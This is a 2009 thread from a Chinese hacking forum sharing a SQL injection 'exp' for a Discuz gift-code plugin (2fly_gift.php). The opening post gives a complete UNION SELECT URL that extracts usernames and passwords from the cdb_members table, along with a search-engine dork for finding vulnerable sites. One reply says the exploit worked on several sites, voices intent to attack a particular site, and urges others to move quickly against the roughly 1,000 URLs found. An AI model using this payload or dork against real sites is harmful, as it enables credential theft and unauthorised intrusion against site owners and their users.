【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: Discuz账号发放插件注入0day [打印本页]

作者: 柔肠寸断 时间: 2009-8-14 22:35 标题: Discuz账号发放插件注入0day

Discuz账号发放插件注入0day
插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:

http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:

作者: 超超 时间: 2009-8-15 12:29

小柔无图不真实图片错误！！！！

作者: 学徒 时间: 2009-8-15 15:19

靠了，图片犯盗

作者: cxy_hh 时间: 2009-8-16 23:19

本帖最后由 cxy_hh 于 2009-8-16 23:27 编辑

DZ也会有这种漏洞?这些天一个色情联盟的DZ被邪八的人搞了,人家出5W来找邪八的那个人.唉我想搞那个联盟好久了,都没搞成!菜呀!不知他用什么搞的呢,会不会是这个呢?DZ太少暴洞了
试了几个确实是可以的,不过大多数都是报gameid参数错误,百度只找到了1000多个url,要搞的话赶紧的唷,呵呵,要不就被人拿光了,呵呵

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)